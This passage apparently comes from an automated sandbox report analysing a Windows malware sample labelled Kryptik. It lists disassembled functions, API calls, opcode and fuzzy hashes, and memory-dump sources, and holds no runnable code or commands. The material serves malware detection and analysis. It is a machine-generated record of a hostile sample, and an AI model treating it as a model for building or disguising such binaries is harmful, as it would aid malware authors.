                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                              • Instruction ID: 4b7949927669a29eef690ae1a349ce348cfd78b5f5db70af7ed7e5ad1e088c59
                                                              • Opcode Fuzzy Hash: d4e8bbadb4119975c1914609911bc9be28093772f9516ce2b5bebb24b6cefd60
                                                              • Instruction Fuzzy Hash: BC1104B37C86017FCB213678ACC0E7B355B9BC17797250238F124963E0DF6188115D65
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00411406,0041A3D8,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?), ref: 00418F7F
                                                              • _free.LIBCMT ref: 00418FDC
                                                              • _free.LIBCMT ref: 00419012
                                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041901D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                              • Instruction ID: 81bc8fc7cbd95881107e9ffec5a672ab3f5eab8e02c6baa7b337ffd9db964308
                                                              • Opcode Fuzzy Hash: 9e0c420a71d57c1eac789ddee66fb36f0bc41bda3a2acfdfdc4fdc3ec7323778
                                                              • Instruction Fuzzy Hash: ED1182723096013A9B212B76AC95EEB265A9BC1378725023FF515832D1DE6D8CC6612D
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,021810AF,?,?,00438470,00000000,?,021811DA,00000004,00429BA4,00429B9C,00429BA4,00000000), ref: 0218107E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                              • Instruction ID: bcb4f8be82acdab7df61cb22aea40e0e046be1c44c9262f09b8cc261a257caf5
                                                              • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                              • Instruction Fuzzy Hash: B811A732A81761BBDB3267689C81B5D77A4AF01760F250524E919FB280D771ED028EE4
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000), ref: 02195990
                                                              • GetLastError.KERNEL32(?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000,?,00000000,?,02192DF1,?), ref: 0219599C
                                                                • Part of subcall function 02195962: CloseHandle.KERNEL32(00437A50,021959AC,?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000,?,00000000), ref: 02195972
                                                              • ___initconout.LIBCMT ref: 021959AC
                                                                • Part of subcall function 02195924: CreateFileW.KERNEL32(00432C28,40000000,00000003,00000000,00000003,00000000,00000000,02195953,02195613,00000000,?,021928A5,?,00000000,00000000,?), ref: 02195937
                                                              • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,02195626,00000000,00000001,00000000,00000000,?,021928A5,?,00000000,00000000,?), ref: 021959C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction ID: 6ebbd09c6758deaf406f0652ae359b4c99c4b44c873ed898612dc3577fb481d6
                                                              • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction Fuzzy Hash: 77F01C36541218BFCF222F95DC04A9E3F27EB097B0B444024FB0DA5120CB328921AB94
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000), ref: 00425729
                                                              • GetLastError.KERNEL32(?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000,?,00422B8A,004244B3), ref: 00425735
                                                                • Part of subcall function 004256FB: CloseHandle.KERNEL32(FFFFFFFE,00425745,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000), ref: 0042570B
                                                              • ___initconout.LIBCMT ref: 00425745
                                                                • Part of subcall function 004256BD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004256EC,004253AC,00000000,?,0042263E,?,00000000,00000000,?), ref: 004256D0
                                                              • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?), ref: 0042575A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction ID: 5c91372ddcb3b0269811c4be46270c2a59ba6c8506d041d04a9d6cbd44174935
                                                              • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                              • Instruction Fuzzy Hash: 69F03736601528BBCF322F91EC0499E3F26FF443B0F854025FB4D95130CA32C9619B98
                                                              APIs
                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                              • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                                • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                              • ___initconout.LIBCMT ref: 1000CD55
                                                                • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                              • String ID:
                                                              • API String ID: 2744216297-0
                                                              • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                              • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                              • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                              • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                              APIs
                                                              • SleepConditionVariableCS.KERNELBASE(?,0040D131,00000064), ref: 0040D1B7
                                                              • LeaveCriticalSection.KERNEL32(004383D4,00438EBC,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1C1
                                                              • WaitForSingleObjectEx.KERNEL32(00438EBC,00000000,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D2
                                                              • EnterCriticalSection.KERNEL32(004383D4,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                              • String ID:
                                                              • API String ID: 3269011525-0
                                                              • Opcode ID: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                              • Instruction ID: 47a6f121230fc22ef05d7342d51693ac5d84e3dbad3790f0b82a870593218e11
                                                              • Opcode Fuzzy Hash: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                              • Instruction Fuzzy Hash: 67E09B31601724A7C7111B50EC08A9EBE18AF0DF50F01503AFD06663A08F661A1687CC
                                                              APIs
                                                              • _free.LIBCMT ref: 02187293
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 021872A6
                                                              • _free.LIBCMT ref: 021872B7
                                                              • _free.LIBCMT ref: 021872C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                              • Instruction ID: 35509aa66dbbe982977da6e286a496b2506d9637bb6bf27fd64985aa2511c466
                                                              • Opcode Fuzzy Hash: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                              • Instruction Fuzzy Hash: 18E02DB6850722EE96127F19BC9085AFA66AB48B30311602FF41416B34CF3A25929F8D
                                                              APIs
                                                              • _free.LIBCMT ref: 0041702C
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 0041703F
                                                              • _free.LIBCMT ref: 00417050
                                                              • _free.LIBCMT ref: 00417061
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                              • Instruction ID: 3fe777f1b78a63b08a2ef341b4c74d1d5c6aa3709f5bbb988e12ac5a6b696405
                                                              • Opcode Fuzzy Hash: 30cbf7fb3445322f5385668cae4fba4876bf89921f2c2bac2e7e205206153011
                                                              • Instruction Fuzzy Hash: 15E0B6B1901322AF8602BF1ABC114CAFA21AB54734301602FF40012A31CF3D19929F9E
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 021861C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 783fcf455c5e9adb1dbf5fd613063b1b93789f97055f9579d1309f56b5fc912d
                                                              • Instruction ID: 5f2d8c2ebee25c95ab20f098f121fe206ba47b0dad25ce6777b08f76b9eead53
                                                              • Opcode Fuzzy Hash: 783fcf455c5e9adb1dbf5fd613063b1b93789f97055f9579d1309f56b5fc912d
                                                              • Instruction Fuzzy Hash: 4A51E160EC83458ACF117734EDC137E77A9DB81754F204EA8E095422EAFB358895CE46
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00415F5D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: e9e7d915405a65ac44a64f576d2f0c225aa02c461c74bbc629d4e2f0a1954376
                                                              • Instruction ID: ca20aa04f77d04b0b03f736f75f58d2336275f3faf1d0bcf3d607f44cc30d12d
                                                              • Opcode Fuzzy Hash: e9e7d915405a65ac44a64f576d2f0c225aa02c461c74bbc629d4e2f0a1954376
                                                              • Instruction Fuzzy Hash: EB5125F1E18601D6CB11FB14C9413FB6BA4DF80781F24496BE095423A9EB3C88D69A8E
                                                              APIs
                                                              • GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 0041EB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID: $uA
                                                              • API String ID: 1807457897-4017129421
                                                              • Opcode ID: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                              • Instruction ID: 76fe35182010dd4070079eecf5458fb6316312039bb569af5976c5917f7ade40
                                                              • Opcode Fuzzy Hash: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                              • Instruction Fuzzy Hash: EE4150745082489BDB218B19CD84FFB7BFDEB15304F2404AED9CB87142E23CA9C59B99
                                                              Strings
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 02186A07, 02186A0E, 02186A44
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                              • API String ID: 0-3288490397
                                                              • Opcode ID: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                              • Instruction ID: a082cbce7b6b16d31a1bb857ffb753d70b2abb885143536f4641af7dce39eedb
                                                              • Opcode Fuzzy Hash: bb4cfbba668be04de8d9afecadb41173a1c3b024eb1c9cedbc90692787106584
                                                              • Instruction Fuzzy Hash: 574171B1E80255AFCB25FF999CC0EAEBBADEB84710F14406AF50597250DBB09A81CF50
                                                              Strings
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 004167A0, 004167A7, 004167DD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                              • API String ID: 0-3288490397
                                                              • Opcode ID: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                              • Instruction ID: ae20e1325de7d9b0d380bebdbbbe849bcc95121cf4aa11dd91f3eee9ce026df2
                                                              • Opcode Fuzzy Hash: 255b861c4cde4eb3723fb2a95b0f68a5a29e851743693505edb5e3ee1a8514b8
                                                              • Instruction Fuzzy Hash: D141BFB0A01219AFDB11EF9ACC819EFBBB8EF85714B11006BF414A7251D778DA81C768
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0217FDC6
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0217FE7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 3480331319-1018135373
                                                              • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction ID: 0a1d8f7f469bca5c3498968cfdc3aecb672c5688f9b7d28cb1608833df4c5ebe
                                                              • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                              • Instruction Fuzzy Hash: 7841DA34A402089FCF10DF58C884AEFBBB5AF85324F25C155EC189B792DB359A16CF91
                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02180688
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction ID: be86047398121605db3d0ffe7226ab1d518796723ce6ed393fc2277b89a2c6b4
                                                              • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction Fuzzy Hash: B441487294120DAFCF15EF94CC80AAEBBB6FF48304F158159F904A7260D3359955DF90
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00410421
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction ID: e60aaeaf298b3da1b7730a43453d697d135fa25be288e1f3ddcf15ba3106ce2b
                                                              • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                              • Instruction Fuzzy Hash: A0417971900209EFCF15DF94C981AEE7BB6FF48304F14806AFA0566252D3799AA0DF54
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2118026453-2084237596
                                                              • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                              • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                              • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                              • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                              APIs
                                                                • Part of subcall function 0041EA79: GetOEMCP.KERNEL32(00000000,0041ECEA,00000000,00000000,004190D3,004190D3,00000000,74DEDF80,00000000), ref: 0041EAA4
                                                              • _free.LIBCMT ref: 0041ED47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: xX}
                                                              • API String ID: 269201875-4185209383
                                                              • Opcode ID: 1ebc31a86c70e5e5643aaa3952117f8feabc167c4cb815bc08971d7ed826ee36
                                                              • Instruction ID: 69cdd6c4c2867ef7a787bbb166e36841f429d1ebd3e145c2c29ae0f87b7b9979
                                                              • Opcode Fuzzy Hash: 1ebc31a86c70e5e5643aaa3952117f8feabc167c4cb815bc08971d7ed826ee36
                                                              • Instruction Fuzzy Hash: A331CF7590020AAFCB10DF6AD880ADF77B5EF44314F10006BFD119B2A1EB359D90CB59
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: hpC
                                                              • API String ID: 269201875-2037328470
                                                              • Opcode ID: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                              • Instruction ID: 97ba9aaf17b238038fd758f77afa5e9c5dc53f614a383523ba12bff53bf80a36
                                                              • Opcode Fuzzy Hash: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                              • Instruction Fuzzy Hash: 1811E672A803126AD720BB28ACC4B257396A751734F14623EF529DB6D0FB74D4438F88
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 021715E9
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                              • String ID: AOJ.$AY@B
                                                              • API String ID: 4132704954-514806208
                                                              • Opcode ID: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                              • Instruction ID: 634c8b16a48b2693582024f35bfa8f54e63b6559580b4d4ba9335cfb29b2574d
                                                              • Opcode Fuzzy Hash: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                              • Instruction Fuzzy Hash: 7A21F6709447449ADB00DF28E9553A9F372EF99324F04666DF8451B251DF7826848F88
                                                              APIs
                                                                • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                                • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                              • __Init_thread_footer.LIBCMT ref: 00401382
                                                                • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                                • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                                • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                              • String ID: AOJ.$AY@B
                                                              • API String ID: 2296764815-514806208
                                                              • Opcode ID: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                              • Instruction ID: e40916875604ea4a6387975861e2a6da87038d1f1b262f1bab1aa9f1cf823530
                                                              • Opcode Fuzzy Hash: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                              • Instruction Fuzzy Hash: 6921F6709047448AD7009F79D9457A9F761EF69314F00627EF8442B2E2DF7C26848F4C
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 02178815
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
